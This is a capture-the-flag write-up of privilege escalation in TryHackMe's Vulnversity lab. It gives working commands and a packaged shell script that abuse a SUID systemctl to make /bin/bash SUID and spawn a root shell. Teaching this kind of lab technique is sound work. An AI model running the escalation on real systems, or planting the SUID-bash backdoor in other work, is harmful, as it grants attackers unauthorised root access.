Task 5 of TryHackMe's Vulnversity CTF room is Privilege Escalation. Previously we compromised the web server by uploading a reverse-shell payload in a PHTML file.
Now that we've got a foothold on the box, can we achieve root-level access?
Task 5 – Privilege Escalation
Our task: now that we have compromised this machine, we are going to escalate our privileges and become the superuser (root).
First of all we need to find the SUID files the room is referring to.
Use the following command to find all files with the SUID bit (mode 4000) set, directing all the errors (there will be a lot of permission-denied messages) down into the null abyss:
find / -perm -4000 2>/dev/null
This will bring back a half-decent list of binaries with the SetUID bit on them.
A careful analysis of this list reveals one file in particular that we can try to exploit: /bin/systemctl. It is not SUID on a stock install, and because systemctl can register and start arbitrary unit files, a SUID copy lets an unprivileged user have systemd run a command of their choosing as root.
Some info from freedesktop.org's man page on the tool:
systemctl — Control the systemd system and service manager
systemctl may be used to introspect and control the state of the "systemd" system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages.
Researching a potential avenue led me to klockw3rks' article, which shows this script as part of the payload:
After spending some time analysing and tweaking this, some additional info from John Hammond helped me arrive at this working payload (written to /tmp, since that is where the unit is linked from below):
$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > /tmp/root.service
We then have systemctl register the unit, which creates a symlink to it under /etc/systemd/system:
$ /bin/systemctl link /tmp/root.service
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
We can then fire off the escalation; enabling the unit with --now starts it immediately, and systemd runs ExecStart as root:
$ /bin/systemctl enable --now /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
If we then check the permissions on bash:
$ ls -lah /bin/bash
-rwsr-sr-x 1 root root 1014K May 16 2017 /bin/bash
We can see the 4th character is an 's': the SUID bit is set, so bash now runs with root's effective UID. (chmod +s sets SGID as well, hence the second 's' in the group slot.)
Now if we run the following, we are escalated to the lofty heights of root:
It may look like the command has hung and there is no prompt; the shell is just a bit mucked up. You can still run commands, e.g.:
Finally the flag at /root/root.txt is accessible:
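The whole chain above (find SUID binaries, pick a candidate, write the unit, link and enable it, verify the bit, spawn the shell), wrapped in shell functions so each step can be checked on its own. This is an added example, not the author's or TryHackMe's script: the candidate-binary list, the SYSTEMCTL variable, the /tmp/root.service path and the use of `bash -p` to keep the SUID-granted effective UID are this example's own choices (the page's own command for the final step is not reproduced here). Nothing privileged runs unless `escalate` is called explicitly on a box where systemctl is actually SUID root.

```sh
#!/bin/sh
# Added example: the SUID-systemctl escalation from this writeup, as checkable steps.
# Not the original author's code; paths, unit name and candidate list are assumptions.

# Step 1: list SUID executables (regular files only; permission errors discarded).
find_suid() {
    find / -type f -perm -4000 2>/dev/null
}

# Step 2: filter a SUID listing down to binaries worth a second look. Illustrative
# list only; GTFOBins (https://gtfobins.github.io) maintains the authoritative one.
flag_candidates() {
    grep -E '/(systemctl|find|vim|python[0-9.]*|perl|awk|env|bash|less|more|cp|nano)$'
}

# Step 3: does an `ls -l` mode string carry the SUID bit? The owner-execute slot
# (4th character) reads 's' (setuid + exec) or 'S' (setuid without exec).
mode_has_suid() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Step 4: write a oneshot unit. When systemd starts it, ExecStart runs as root.
# $1 = unit path (must end in .service), $2 = command for ExecStart's /bin/sh -c.
write_unit() {
    printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "%s"\n\n[Install]\nWantedBy=multi-user.target\n' \
        "$2" > "$1"
}

# Step 5: have the SUID systemctl register and start the unit, then confirm the
# result and drop into a root shell. SYSTEMCTL may be overridden for a copied binary.
escalate() {
    unit=/tmp/root.service
    sc="${SYSTEMCTL:-/bin/systemctl}"
    write_unit "$unit" 'chmod +s /bin/bash'
    "$sc" link "$unit"
    "$sc" enable --now "$unit"
    # Verify: the owner-execute position of /bin/bash should now be 's'.
    mode_has_suid "$(ls -l /bin/bash | cut -c1-10)" || {
        echo "SUID bit not set on /bin/bash; escalation failed" >&2
        return 1
    }
    # bash resets euid to the real uid unless started in privileged mode (-p).
    exec /bin/bash -p
}

# Stand-alone run: show the candidate list, do not escalate.
if [ "${1:-}" = "scan" ]; then
    find_suid | flag_candidates
fi
```

Usage: `sh suid_systemctl.sh scan` prints the interesting SUID binaries; `. ./suid_systemctl.sh && escalate` performs the chain. The verification step matters: if `chmod +s` did not take effect (for example because the unit failed to start), spawning `bash -p` would silently give you an ordinary shell.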
With that, TryHackMe's Vulnversity room is complete.